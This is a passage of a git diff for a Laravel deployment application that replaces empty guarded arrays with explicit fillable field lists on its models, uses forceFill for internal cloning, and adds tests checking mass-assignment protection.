'status' => 'exited',
- ]);
+ ])->save();
$persistentVolumes = $database->persistentStorages()->get();
foreach ($persistentVolumes as $volume) {
@@ -369,7 +369,7 @@ public function clone(string $type)
'id',
'created_at',
'updated_at',
- ])->fill([
+ ])->forceFill([
'name' => $newName,
'resource_id' => $database->id,
]);
@@ -398,7 +398,7 @@ public function clone(string $type)
'id',
'created_at',
'updated_at',
- ])->fill([
+ ])->forceFill([
'resource_id' => $database->id,
]);
$newStorage->save();
@@ -411,7 +411,7 @@ public function clone(string $type)
'id',
'created_at',
'updated_at',
- ])->fill([
+ ])->forceFill([
'uuid' => $uuid,
'database_id' => $database->id,
'database_type' => $database->getMorphClass(),
diff --git a/app/Livewire/Project/Shared/ResourceOperations.php b/app/Livewire/Project/Shared/ResourceOperations.php
index e769e4bcb..a26b43026 100644
--- a/app/Livewire/Project/Shared/ResourceOperations.php
+++ b/app/Livewire/Project/Shared/ResourceOperations.php
@@ -7,9 +7,18 @@
use App\Actions\Service\StartService;
use App\Actions\Service\StopService;
use App\Jobs\VolumeCloneJob;
+use App\Models\Application;
use App\Models\Environment;
use App\Models\Project;
+use App\Models\StandaloneClickhouse;
use App\Models\StandaloneDocker;
+use App\Models\StandaloneDragonfly;
+use App\Models\StandaloneKeydb;
+use App\Models\StandaloneMariadb;
+use App\Models\StandaloneMongodb;
+use App\Models\StandaloneMysql;
+use App\Models\StandalonePostgresql;
+use App\Models\StandaloneRedis;
use App\Models\SwarmDocker;
use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
use Livewire\Component;
@@ -60,7 +69,7 @@ public function cloneTo($destination_id)
$uuid = (string) new Cuid2;
$server = $new_destination->server;
- if ($this->resource->getMorphClass() === \App\Models\Application::class) {
+ if ($this->resource->getMorphClass() === Application::class) {
$new_resource = clone_application($this->resource, $new_destination, ['uuid' => $uuid], $this->cloneVolumeData);
$route = route('project.application.configuration', [
@@ -71,21 +80,21 @@ public function cloneTo($destination_id)
return redirect()->to($route);
} elseif (
- $this->resource->getMorphClass() === \App\Models\StandalonePostgresql::class ||
- $this->resource->getMorphClass() === \App\Models\StandaloneMongodb::class ||
- $this->resource->getMorphClass() === \App\Models\StandaloneMysql::class ||
- $this->resource->getMorphClass() === \App\Models\StandaloneMariadb::class ||
- $this->resource->getMorphClass() === \App\Models\StandaloneRedis::class ||
- $this->resource->getMorphClass() === \App\Models\StandaloneKeydb::class ||
- $this->resource->getMorphClass() === \App\Models\StandaloneDragonfly::class ||
- $this->resource->getMorphClass() === \App\Models\StandaloneClickhouse::class
+ $this->resource->getMorphClass() === StandalonePostgresql::class ||
+ $this->resource->getMorphClass() === StandaloneMongodb::class ||
+ $this->resource->getMorphClass() === StandaloneMysql::class ||
+ $this->resource->getMorphClass() === StandaloneMariadb::class ||
+ $this->resource->getMorphClass() === StandaloneRedis::class ||
+ $this->resource->getMorphClass() === StandaloneKeydb::class ||
+ $this->resource->getMorphClass() === StandaloneDragonfly::class ||
+ $this->resource->getMorphClass() === StandaloneClickhouse::class
) {
$uuid = (string) new Cuid2;
$new_resource = $this->resource->replicate([
'id',
'created_at',
'updated_at',
- ])->fill([
+ ])->forceFill([
'uuid' => $uuid,
'name' => $this->resource->name.'-clone-'.$uuid,
'status' => 'exited',
@@ -133,7 +142,7 @@ public function cloneTo($destination_id)
'id',
'created_at',
'updated_at',
- ])->fill([
+ ])->forceFill([
'name' => $newName,
'resource_id' => $new_resource->id,
]);
@@ -162,7 +171,7 @@ public function cloneTo($destination_id)
'id',
'created_at',
'updated_at',
- ])->fill([
+ ])->forceFill([
'resource_id' => $new_resource->id,
]);
$newStorage->save();
@@ -175,7 +184,7 @@ public function cloneTo($destination_id)
'id',
'created_at',
'updated_at',
- ])->fill([
+ ])->forceFill([
'uuid' => $uuid,
'database_id' => $new_resource->id,
'database_type' => $new_resource->getMorphClass(),
@@ -194,7 +203,7 @@ public function cloneTo($destination_id)
'id',
'created_at',
'updated_at',
- ])->fill($payload);
+ ])->forceFill($payload);
$newEnvironmentVariable->save();
}
@@ -211,7 +220,7 @@ public function cloneTo($destination_id)
'id',
'created_at',
'updated_at',
- ])->fill([
+ ])->forceFill([
'uuid' => $uuid,
'name' => $this->resource->name.'-clone-'.$uuid,
'destination_id' => $new_destination->id,
@@ -232,7 +241,7 @@ public function cloneTo($destination_id)
'id',
'created_at',
'updated_at',
- ])->fill([
+ ])->forceFill([
'uuid' => (string) new Cuid2,
'service_id' => $new_resource->id,
'team_id' => currentTeam()->id,
@@ -246,7 +255,7 @@ public function cloneTo($destination_id)
'id',
'created_at',
'updated_at',
- ])->fill([
+ ])->forceFill([
'resourceable_id' => $new_resource->id,
'resourceable_type' => $new_resource->getMorphClass(),
]);
@@ -254,9 +263,9 @@ public function cloneTo($destination_id)
}
foreach ($new_resource->applications() as $application) {
- $application->update([
+ $application->forceFill([
'status' => 'exited',
- ]);
+ ])->save();
$persistentVolumes = $application->persistentStorages()->get();
foreach ($persistentVolumes as $volume) {
@@ -271,7 +280,7 @@ public function cloneTo($destination_id)
'id',
'created_at',
'updated_at',
- ])->fill([
+ ])->forceFill([
'name' => $newName,
'resource_id' => $application->id,
]);
@@ -296,9 +305,9 @@ public function cloneTo($destination_id)
}
foreach ($new_resource->databases() as $database) {
- $database->update([
+ $database->forceFill([
'status' => 'exited',
- ]);
+ ])->save();
$persistentVolumes = $database->persistentStorages()->get();
foreach ($persistentVolumes as $volume) {
@@ -313,7 +322,7 @@ public function cloneTo($destination_id)
'id',
'created_at',
'updated_at',
- ])->fill([
+ ])->forceFill([
'name' => $newName,
'resource_id' => $database->id,
]);
@@ -354,9 +363,9 @@ public function moveTo($environment_id)
try {
$this->authorize('update', $this->resource);
$new_environment = Environment::ownedByCurrentTeam()->findOrFail($environment_id);
- $this->resource->update([
+ $this->resource->forceFill([
'environment_id' => $environment_id,
- ]);
+ ])->save();
if ($this->resource->type() === 'application') {
$route = route('project.application.configuration', [
'project_uuid' => $new_environment->project->uuid,
diff --git a/app/Models/Application.php b/app/Models/Application.php
index c446052b3..a4789ae4a 100644
--- a/app/Models/Application.php
+++ b/app/Models/Application.php
@@ -118,7 +118,92 @@ class Application extends BaseModel
private static $parserVersion = '5';
- protected $guarded = [];
+ protected $fillable = [
+ 'name',
+ 'description',
+ 'fqdn',
+ 'git_repository',
+ 'git_branch',
+ 'git_commit_sha',
+ 'git_full_url',
+ 'docker_registry_image_name',
+ 'docker_registry_image_tag',
+ 'build_pack',
+ 'static_image',
+ 'install_command',
+ 'build_command',
+ 'start_command',
+ 'ports_exposes',
+ 'ports_mappings',
+ 'base_directory',
+ 'publish_directory',
+ 'health_check_enabled',
+ 'health_check_path',
+ 'health_check_port',
+ 'health_check_host',
+ 'health_check_method',
+ 'health_check_return_code',
+ 'health_check_scheme',
+ 'health_check_response_text',
+ 'health_check_interval',
+ 'health_check_timeout',
+ 'health_check_retries',
+ 'health_check_start_period',
+ 'health_check_type',
+ 'health_check_command',
+ 'limits_memory',
+ 'limits_memory_swap',
+ 'limits_memory_swappiness',
+ 'limits_memory_reservation',
+ 'limits_cpus',
+ 'limits_cpuset',
+ 'limits_cpu_shares',
+ 'status',
+ 'preview_url_template',
+ 'dockerfile',
+ 'dockerfile_location',
+ 'dockerfile_target_build',
+ 'custom_labels',
+ 'custom_docker_run_options',
+ 'post_deployment_command',
+ 'post_deployment_command_container',
+ 'pre_deployment_command',
+ 'pre_deployment_command_container',
+ 'manual_webhook_secret_github',
+ 'manual_webhook_secret_gitlab',
+ 'manual_webhook_secret_bitbucket',
+ 'manual_webhook_secret_gitea',
+ 'docker_compose_location',
+ 'docker_compose_pr_location',
+ 'docker_compose',
+ 'docker_compose_pr',
+ 'docker_compose_raw',
+ 'docker_compose_pr_raw',
+ 'docker_compose_domains',
+ 'docker_compose_custom_start_command',
+ 'docker_compose_custom_build_command',
+ 'swarm_replicas',
+ 'swarm_placement_constraints',
+ 'watch_paths',
+ 'redirect',
+ 'compose_parsing_version',
+ 'custom_nginx_configuration',
+ 'custom_network_aliases',
+ 'custom_healthcheck_found',
+ 'nixpkgsarchive',
+ 'is_http_basic_auth_enabled',
+ 'http_basic_auth_username',
+ 'http_basic_auth_password',
+ 'connect_to_docker_network',
+ 'force_domain_override',
+ 'is_container_label_escape_enabled',
+ 'use_build_server',
+ 'config_hash',
+ 'last_online_at',
+ 'restart_count',
+ 'last_restart_at',
+ 'last_restart_type',
+ ];
protected $appends = ['server_status'];
@@ -1145,7 +1230,7 @@ public function getGitRemoteStatus(string $deployment_uuid)
'is_accessible' => true,
'error' => null,
];
- } catch (\RuntimeException $ex) {
+ } catch (RuntimeException $ex) {
return [
'is_accessible' => false,
'error' => $ex->getMessage(),
@@ -1202,7 +1287,7 @@ public function generateGitLsRemoteCommands(string $deployment_uuid, bool $exec_
];
}
- if ($this->source->getMorphClass() === \App\Models\GitlabApp::class) {
+ if ($this->source->getMorphClass() === GitlabApp::class) {
$gitlabSource = $this->source;
$private_key = data_get($gitlabSource, 'privateKey.private_key');
@@ -1354,7 +1439,7 @@ public function generateGitImportCommands(string $deployment_uuid, int $pull_req
$source_html_url_host = $url['host'];
$source_html_url_scheme = $url['scheme'];
- if ($this->source->getMorphClass() === \App\Models\GithubApp::class) {
+ if ($this->source->getMorphClass() === GithubApp::class) {
if ($this->source->is_public) {
$fullRepoUrl = "{$this->source->html_url}/{$customRepository}";
$escapedRepoUrl = escapeshellarg("{$this->source->html_url}/{$customRepository}");
@@ -1409,7 +1494,7 @@ public function generateGitImportCommands(string $deployment_uuid, int $pull_req
];
}
- if ($this->source->getMorphClass() === \App\Models\GitlabApp::class) {
+ if ($this->source->getMorphClass() === GitlabApp::class) {
$gitlabSource = $this->source;
$private_key = data_get($gitlabSource, 'privateKey.private_key');
@@ -1600,7 +1685,7 @@ public function oldRawParser()
try {
$yaml = Yaml::parse($this->docker_compose_raw);
} catch (\Exception $e) {
- throw new \RuntimeException($e->getMessage());
+ throw new RuntimeException($e->getMessage());
}
$services = data_get($yaml, 'services');
@@ -1682,7 +1767,7 @@ public function loadComposeFile($isInit = false, ?string $restoreBaseDirectory =
$fileList = collect([".$workdir$composeFile"]);
$gitRemoteStatus = $this->getGitRemoteStatus(deployment_uuid: $uuid);
if (! $gitRemoteStatus['is_accessible']) {
- throw new \RuntimeException("Failed to read Git source:\n\n{$gitRemoteStatus['error']}");
+ throw new RuntimeException("Failed to read Git source:\n\n{$gitRemoteStatus['error']}");
}
$getGitVersion = instant_remote_process(['git --version'], $this->destination->server, false);
$gitVersion = str($getGitVersion)->explode(' ')->last();
@@ -1732,15 +1817,15 @@ public function loadComposeFile($isInit = false, ?string $restoreBaseDirectory =
$this->save();
if (str($e->getMessage())->contains('No such file')) {
- throw new \RuntimeException("Docker Compose file not found at: $workdir$composeFile (branch: {$this->git_branch})
Check if you used the right extension (.yaml or .yml) in the compose file name.");
+ throw new RuntimeException("Docker Compose file not found at: $workdir$composeFile (branch: {$this->git_branch})
Check if you used the right extension (.yaml or .yml) in the compose file name.");
}
if (str($e->getMessage())->contains('fatal: repository') && str($e->getMessage())->contains('does not exist')) {
if ($this->deploymentType() === 'deploy_key') {
- throw new \RuntimeException('Your deploy key does not have access to the repository. Please check your deploy key and try again.');
+ throw new RuntimeException('Your deploy key does not have access to the repository. Please check your deploy key and try again.');
}
- throw new \RuntimeException('Repository does not exist. Please check your repository URL and try again.');
+ throw new RuntimeException('Repository does not exist. Please check your repository URL and try again.');
}
- throw new \RuntimeException($e->getMessage());
+ throw new RuntimeException($e->getMessage());
} finally {
// Cleanup only - restoration happens in catch block
$commands = collect([
@@ -1793,7 +1878,7 @@ public function loadComposeFile($isInit = false, ?string $restoreBaseDirectory =
$this->base_directory = $initialBaseDirectory;
$this->save();
- throw new \RuntimeException("Docker Compose file not found at: $workdir$composeFile (branch: {$this->git_branch})
Check if you used the right extension (.yaml or .yml) in the compose file name.");
+ throw new RuntimeException("Docker Compose file not found at: $workdir$composeFile (branch: {$this->git_branch})
Check if you used the right extension (.yaml or .yml) in the compose file name.");
}
}
diff --git a/app/Models/Server.php b/app/Models/Server.php
index 9237763c8..b3dcf6353 100644
--- a/app/Models/Server.php
+++ b/app/Models/Server.php
@@ -265,8 +265,6 @@ public static function flushIdentityMap(): void
'server_metadata',
];
- protected $guarded = [];
-
use HasSafeStringAttribute;
public function type()
diff --git a/app/Models/Service.php b/app/Models/Service.php
index 84c047bb7..b3ff85e53 100644
--- a/app/Models/Service.php
+++ b/app/Models/Service.php
@@ -15,6 +15,7 @@
use OpenApi\Attributes as OA;
use Spatie\Activitylog\Models\Activity;
use Spatie\Url\Url;
+use Symfony\Component\Yaml\Yaml;
use Visus\Cuid2\Cuid2;
#[OA\Schema(
@@ -47,7 +48,16 @@ class Service extends BaseModel
private static $parserVersion = '5';
- protected $guarded = [];
+ protected $fillable = [
+ 'name',
+ 'description',
+ 'docker_compose_raw',
+ 'docker_compose',
+ 'connect_to_docker_network',
+ 'service_type',
+ 'config_hash',
+ 'compose_parsing_version',
+ ];
protected $appends = ['server_status', 'status'];
@@ -1552,7 +1562,7 @@ public function saveComposeConfigs()
// Generate SERVICE_NAME_* environment variables from docker-compose services
if ($this->docker_compose) {
try {
- $dockerCompose = \Symfony\Component\Yaml\Yaml::parse($this->docker_compose);
+ $dockerCompose = Yaml::parse($this->docker_compose);
$services = data_get($dockerCompose, 'services', []);
foreach ($services as $serviceName => $_) {
$envs->push('SERVICE_NAME_'.str($serviceName)->replace('-', '_')->replace('.', '_')->upper().'='.$serviceName);
diff --git a/app/Models/StandaloneClickhouse.php b/app/Models/StandaloneClickhouse.php
index 143aadb6a..74382d87c 100644
--- a/app/Models/StandaloneClickhouse.php
+++ b/app/Models/StandaloneClickhouse.php
@@ -13,7 +13,31 @@ class StandaloneClickhouse extends BaseModel
{
use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
- protected $guarded = [];
+ protected $fillable = [
+ 'name',
+ 'description',
+ 'clickhouse_admin_user',
+ 'clickhouse_admin_password',
+ 'is_log_drain_enabled',
+ 'is_include_timestamps',
+ 'status',
+ 'image',
+ 'is_public',
+ 'public_port',
+ 'ports_mappings',
+ 'limits_memory',
+ 'limits_memory_swap',
+ 'limits_memory_swappiness',
+ 'limits_memory_reservation',
+ 'limits_cpus',
+ 'limits_cpuset',
+ 'limits_cpu_shares',
+ 'started_at',
+ 'restart_count',
+ 'last_restart_at',
+ 'last_restart_type',
+ 'last_online_at',
+ ];
protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
diff --git a/app/Models/StandaloneDragonfly.php b/app/Models/StandaloneDragonfly.php
index c823c305b..7cc74f0ce 100644
--- a/app/Models/StandaloneDragonfly.php
+++ b/app/Models/StandaloneDragonfly.php
@@ -13,7 +13,30 @@ class StandaloneDragonfly extends BaseModel
{
use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
- protected $guarded = [];
+ protected $fillable = [
+ 'name',
+ 'description',
+ 'dragonfly_password',
+ 'is_log_drain_enabled',
+ 'is_include_timestamps',
+ 'status',
+ 'image',
+ 'is_public',
+ 'public_port',
+ 'ports_mappings',
+ 'limits_memory',
+ 'limits_memory_swap',
+ 'limits_memory_swappiness',
+ 'limits_memory_reservation',
+ 'limits_cpus',
+ 'limits_cpuset',
+ 'limits_cpu_shares',
+ 'started_at',
+ 'restart_count',
+ 'last_restart_at',
+ 'last_restart_type',
+ 'last_online_at',
+ ];
protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
diff --git a/app/Models/StandaloneKeydb.php b/app/Models/StandaloneKeydb.php
index f286e8538..7a0d7f03d 100644
--- a/app/Models/StandaloneKeydb.php
+++ b/app/Models/StandaloneKeydb.php
@@ -13,7 +13,31 @@ class StandaloneKeydb extends BaseModel
{
use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
- protected $guarded = [];
+ protected $fillable = [
+ 'name',
+ 'description',
+ 'keydb_password',
+ 'keydb_conf',
+ 'is_log_drain_enabled',
+ 'is_include_timestamps',
+ 'status',
+ 'image',
+ 'is_public',
+ 'public_port',
+ 'ports_mappings',
+ 'limits_memory',
+ 'limits_memory_swap',
+ 'limits_memory_swappiness',
+ 'limits_memory_reservation',
+ 'limits_cpus',
+ 'limits_cpuset',
+ 'limits_cpu_shares',
+ 'started_at',
+ 'restart_count',
+ 'last_restart_at',
+ 'last_restart_type',
+ 'last_online_at',
+ ];
protected $appends = ['internal_db_url', 'external_db_url', 'server_status'];
diff --git a/app/Models/StandaloneMariadb.php b/app/Models/StandaloneMariadb.php
index efa62353c..6cac9e5f4 100644
--- a/app/Models/StandaloneMariadb.php
+++ b/app/Models/StandaloneMariadb.php
@@ -14,7 +14,32 @@ class StandaloneMariadb extends BaseModel
{
use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
- protected $guarded = [];
+ protected $fillable = [
+ 'name',
+ 'description',
+ 'mariadb_root_password',
+ 'mariadb_user',
+ 'mariadb_password',
+ 'mariadb_database',
+ 'mariadb_conf',
+ 'status',
+ 'image',
+ 'is_public',
+ 'public_port',
+ 'ports_mappings',
+ 'limits_memory',
+ 'limits_memory_swap',
+ 'limits_memory_swappiness',
+ 'limits_memory_reservation',
+ 'limits_cpus',
+ 'limits_cpuset',
+ 'limits_cpu_shares',
+ 'started_at',
+ 'restart_count',
+ 'last_restart_at',
+ 'last_restart_type',
+ 'last_online_at',
+ ];
protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
diff --git a/app/Models/StandaloneMongodb.php b/app/Models/StandaloneMongodb.php
index 9418ebc21..5ca4ef5d3 100644
--- a/app/Models/StandaloneMongodb.php
+++ b/app/Models/StandaloneMongodb.php
@@ -13,7 +13,31 @@ class StandaloneMongodb extends BaseModel
{
use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
- protected $guarded = [];
+ protected $fillable = [
+ 'name',
+ 'description',
+ 'mongo_conf',
+ 'mongo_initdb_root_username',
+ 'mongo_initdb_root_password',
+ 'mongo_initdb_database',
+ 'status',
+ 'image',
+ 'is_public',
+ 'public_port',
+ 'ports_mappings',
+ 'limits_memory',
+ 'limits_memory_swap',
+ 'limits_memory_swappiness',
+ 'limits_memory_reservation',
+ 'limits_cpus',
+ 'limits_cpuset',
+ 'limits_cpu_shares',
+ 'started_at',
+ 'restart_count',
+ 'last_restart_at',
+ 'last_restart_type',
+ 'last_online_at',
+ ];
protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
diff --git a/app/Models/StandaloneMysql.php b/app/Models/StandaloneMysql.php
index 2b7e9f2b6..cf8d78a9c 100644
--- a/app/Models/StandaloneMysql.php
+++ b/app/Models/StandaloneMysql.php
@@ -13,7 +13,32 @@ class StandaloneMysql extends BaseModel
{
use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
- protected $guarded = [];
+ protected $fillable = [
+ 'name',
+ 'description',
+ 'mysql_root_password',
+ 'mysql_user',
+ 'mysql_password',
+ 'mysql_database',
+ 'mysql_conf',
+ 'status',
+ 'image',
+ 'is_public',
+ 'public_port',
+ 'ports_mappings',
+ 'limits_memory',
+ 'limits_memory_swap',
+ 'limits_memory_swappiness',
+ 'limits_memory_reservation',
+ 'limits_cpus',
+ 'limits_cpuset',
+ 'limits_cpu_shares',
+ 'started_at',
+ 'restart_count',
+ 'last_restart_at',
+ 'last_restart_type',
+ 'last_online_at',
+ ];
protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
diff --git a/app/Models/StandalonePostgresql.php b/app/Models/StandalonePostgresql.php
index cea600236..7db334c5d 100644
--- a/app/Models/StandalonePostgresql.php
+++ b/app/Models/StandalonePostgresql.php
@@ -13,7 +13,34 @@ class StandalonePostgresql extends BaseModel
{
use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
- protected $guarded = [];
+ protected $fillable = [
+ 'name',
+ 'description',
+ 'postgres_user',
+ 'postgres_password',
+ 'postgres_db',
+ 'postgres_initdb_args',
+ 'postgres_host_auth_method',
+ 'postgres_conf',
+ 'init_scripts',
+ 'status',
+ 'image',
+ 'is_public',
+ 'public_port',
+ 'ports_mappings',
+ 'limits_memory',
+ 'limits_memory_swap',
+ 'limits_memory_swappiness',
+ 'limits_memory_reservation',
+ 'limits_cpus',
+ 'limits_cpuset',
+ 'limits_cpu_shares',
+ 'started_at',
+ 'restart_count',
+ 'last_restart_at',
+ 'last_restart_type',
+ 'last_online_at',
+ ];
protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
diff --git a/app/Models/StandaloneRedis.php b/app/Models/StandaloneRedis.php
index 0e904ab31..812a0e5cb 100644
--- a/app/Models/StandaloneRedis.php
+++ b/app/Models/StandaloneRedis.php
@@ -13,7 +13,29 @@ class StandaloneRedis extends BaseModel
{
use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
- protected $guarded = [];
+ protected $fillable = [
+ 'name',
+ 'description',
+ 'redis_password',
+ 'redis_conf',
+ 'status',
+ 'image',
+ 'is_public',
+ 'public_port',
+ 'ports_mappings',
+ 'limits_memory',
+ 'limits_memory_swap',
+ 'limits_memory_swappiness',
+ 'limits_memory_reservation',
+ 'limits_cpus',
+ 'limits_cpuset',
+ 'limits_cpu_shares',
+ 'started_at',
+ 'restart_count',
+ 'last_restart_at',
+ 'last_restart_type',
+ 'last_online_at',
+ ];
protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
diff --git a/app/Models/Team.php b/app/Models/Team.php
index 5a7b377b6..4b9751706 100644
--- a/app/Models/Team.php
+++ b/app/Models/Team.php
@@ -40,7 +40,14 @@ class Team extends Model implements SendsDiscord, SendsEmail, SendsPushover, Sen
{
use HasFactory, HasNotificationSettings, HasSafeStringAttribute, Notifiable;
- protected $guarded = [];
+ protected $fillable = [
+ 'name',
+ 'description',
+ 'show_boarding',
+ 'custom_server_limit',
+ 'use_instance_email_settings',
+ 'resend_api_key',
+ ];
protected $casts = [
'personal_team' => 'boolean',
diff --git a/app/Models/User.php b/app/Models/User.php
index 4561cddb2..6b6f93239 100644
--- a/app/Models/User.php
+++ b/app/Models/User.php
@@ -4,7 +4,9 @@
use App\Jobs\UpdateStripeCustomerEmailJob;
use App\Notifications\Channels\SendsEmail;
+use App\Notifications\TransactionalEmails\EmailChangeVerification;
use App\Notifications\TransactionalEmails\ResetPassword as TransactionalEmailsResetPassword;
+use App\Services\ChangelogService;
use App\Traits\DeletesUserSessions;
use DateTimeInterface;
use Illuminate\Database\Eloquent\Factories\HasFactory;
@@ -41,7 +43,16 @@ class User extends Authenticatable implements SendsEmail
{
use DeletesUserSessions, HasApiTokens, HasFactory, Notifiable, TwoFactorAuthenticatable;
- protected $guarded = [];
+ protected $fillable = [
+ 'name',
+ 'email',
+ 'password',
+ 'force_password_reset',
+ 'marketing_emails',
+ 'pending_email',
+ 'email_change_code',
+ 'email_change_code_expires_at',
+ ];
protected $hidden = [
'password',
@@ -228,7 +239,7 @@ public function changelogReads()
public function getUnreadChangelogCount(): int
{
- return app(\App\Services\ChangelogService::class)->getUnreadCountForUser($this);
+ return app(ChangelogService::class)->getUnreadCountForUser($this);
}
public function getRecipients(): array
@@ -239,7 +250,7 @@ public function getRecipients(): array
public function sendVerificationEmail()
{
$mail = new MailMessage;
- $url = Url::temporarySignedRoute(
+ $url = URL::temporarySignedRoute(
'verify.verify',
Carbon::now()->addMinutes(Config::get('auth.verification.expire', 60)),
[
@@ -408,7 +419,7 @@ public function requestEmailChange(string $newEmail): void
]);
// Send verification email to new address
- $this->notify(new \App\Notifications\TransactionalEmails\EmailChangeVerification($this, $code, $newEmail, $expiresAt));
+ $this->notify(new EmailChangeVerification($this, $code, $newEmail, $expiresAt));
}
public function isEmailChangeCodeValid(string $code): bool
diff --git a/bootstrap/helpers/applications.php b/bootstrap/helpers/applications.php
index c522cd0ca..fbcedf277 100644
--- a/bootstrap/helpers/applications.php
+++ b/bootstrap/helpers/applications.php
@@ -6,6 +6,7 @@
use App\Jobs\VolumeCloneJob;
use App\Models\Application;
use App\Models\ApplicationDeploymentQueue;
+use App\Models\EnvironmentVariable;
use App\Models\Server;
use App\Models\StandaloneDocker;
use Spatie\Url\Url;
@@ -192,7 +193,7 @@ function clone_application(Application $source, $destination, array $overrides =
$server = $destination->server;
if ($server->team_id !== currentTeam()->id) {
- throw new \RuntimeException('Destination does not belong to the current team.');
+ throw new RuntimeException('Destination does not belong to the current team.');
}
// Prepare name and URL
@@ -211,7 +212,7 @@ function clone_application(Application $source, $destination, array $overrides =
'updated_at',
'additional_servers_count',
'additional_networks_count',
- ])->fill(array_merge([
+ ])->forceFill(array_merge([
'uuid' => $uuid,
'name' => $name,
'fqdn' => $url,
@@ -322,8 +323,8 @@ function clone_application(Application $source, $destination, array $overrides =
destination: $source->destination,
no_questions_asked: true
);
- } catch (\Exception $e) {
- \Log::error('Failed to copy volume data for '.$volume->name.': '.$e->getMessage());
+ } catch (Exception $e) {
+ Log::error('Failed to copy volume data for '.$volume->name.': '.$e->getMessage());
}
}
}
@@ -344,7 +345,7 @@ function clone_application(Application $source, $destination, array $overrides =
// Clone production environment variables without triggering the created hook
$environmentVariables = $source->environment_variables()->get();
foreach ($environmentVariables as $environmentVariable) {
- \App\Models\EnvironmentVariable::withoutEvents(function () use ($environmentVariable, $newApplication) {
+ EnvironmentVariable::withoutEvents(function () use ($environmentVariable, $newApplication) {
$newEnvironmentVariable = $environmentVariable->replicate([
'id',
'created_at',
@@ -361,7 +362,7 @@ function clone_application(Application $source, $destination, array $overrides =
// Clone preview environment variables
$previewEnvironmentVariables = $source->environment_variables_preview()->get();
foreach ($previewEnvironmentVariables as $previewEnvironmentVariable) {
- \App\Models\EnvironmentVariable::withoutEvents(function () use ($previewEnvironmentVariable, $newApplication) {
+ EnvironmentVariable::withoutEvents(function () use ($previewEnvironmentVariable, $newApplication) {
$newPreviewEnvironmentVariable = $previewEnvironmentVariable->replicate([
'id',
'created_at',
diff --git a/tests/Feature/MassAssignmentProtectionTest.php b/tests/Feature/MassAssignmentProtectionTest.php
new file mode 100644
index 000000000..f6518648f
--- /dev/null
+++ b/tests/Feature/MassAssignmentProtectionTest.php
@@ -0,0 +1,182 @@
+getGuarded();
+ $fillable = $model->getFillable();
+
+ // Model must NOT have $guarded = [] (empty guard = no protection)
+ // It should either have non-empty $guarded OR non-empty $fillable
+ $hasProtection = $guarded !== ['*'] ? count($guarded) > 0 : true;
+ $hasProtection = $hasProtection || count($fillable) > 0;
+
+ expect($hasProtection)
+ ->toBeTrue("Model {$modelClass} has no mass assignment protection (empty \$guarded and empty \$fillable)");
+ }
+ });
+
+ test('Application model blocks mass assignment of relationship IDs', function () {
+ $application = new Application;
+ $dangerousFields = ['id', 'uuid', 'environment_id', 'destination_id', 'destination_type', 'source_id', 'source_type', 'private_key_id', 'repository_project_id'];
+
+ foreach ($dangerousFields as $field) {
+ expect($application->isFillable($field))
+ ->toBeFalse("Application model should not allow mass assignment of '{$field}'");
+ }
+ });
+
+ test('Application model allows mass assignment of user-facing fields', function () {
+ $application = new Application;
+ $userFields = ['name', 'description', 'git_repository', 'git_branch', 'build_pack', 'install_command', 'build_command', 'start_command', 'ports_exposes', 'health_check_path', 'limits_memory', 'status'];
+
+ foreach ($userFields as $field) {
+ expect($application->isFillable($field))
+ ->toBeTrue("Application model should allow mass assignment of '{$field}'");
+ }
+ });
+
+ test('Server model has $fillable and no conflicting $guarded', function () {
+ $server = new Server;
+ $fillable = $server->getFillable();
+ $guarded = $server->getGuarded();
+
+ expect($fillable)->not->toBeEmpty('Server model should have explicit $fillable');
+
+ // Guarded should be the default ['*'] when $fillable is set, not []
+ expect($guarded)->not->toBe([], 'Server model should not have $guarded = [] overriding $fillable');
+ });
+
+ test('Server model blocks mass assignment of dangerous fields', function () {
+ $server = new Server;
+
+ // These fields should not be mass-assignable via the API
+ expect($server->isFillable('id'))->toBeFalse();
+ expect($server->isFillable('uuid'))->toBeFalse();
+ expect($server->isFillable('created_at'))->toBeFalse();
+ });
+
+ test('User model blocks mass assignment of auth-sensitive fields', function () {
+ $user = new User;
+
+ expect($user->isFillable('id'))->toBeFalse('User id should not be fillable');
+ expect($user->isFillable('email_verified_at'))->toBeFalse('email_verified_at should not be fillable');
+ expect($user->isFillable('remember_token'))->toBeFalse('remember_token should not be fillable');
+ expect($user->isFillable('two_factor_secret'))->toBeFalse('two_factor_secret should not be fillable');
+ expect($user->isFillable('two_factor_recovery_codes'))->toBeFalse('two_factor_recovery_codes should not be fillable');
+ });
+
+ test('User model allows mass assignment of profile fields', function () {
+ $user = new User;
+
+ expect($user->isFillable('name'))->toBeTrue();
+ expect($user->isFillable('email'))->toBeTrue();
+ expect($user->isFillable('password'))->toBeTrue();
+ });
+
+ test('Team model blocks mass assignment of internal fields', function () {
+ $team = new Team;
+
+ expect($team->isFillable('id'))->toBeFalse();
+ expect($team->isFillable('personal_team'))->toBeFalse('personal_team should not be fillable');
+ });
+
+ test('standalone database models block mass assignment of relationship IDs', function () {
+ $models = [
+ StandalonePostgresql::class,
+ StandaloneRedis::class,
+ StandaloneMysql::class,
+ StandaloneMariadb::class,
+ StandaloneMongodb::class,
+ StandaloneKeydb::class,
+ StandaloneDragonfly::class,
+ StandaloneClickhouse::class,
+ ];
+
+ foreach ($models as $modelClass) {
+ $model = new $modelClass;
+ $dangerousFields = ['id', 'uuid', 'environment_id', 'destination_id', 'destination_type'];
+
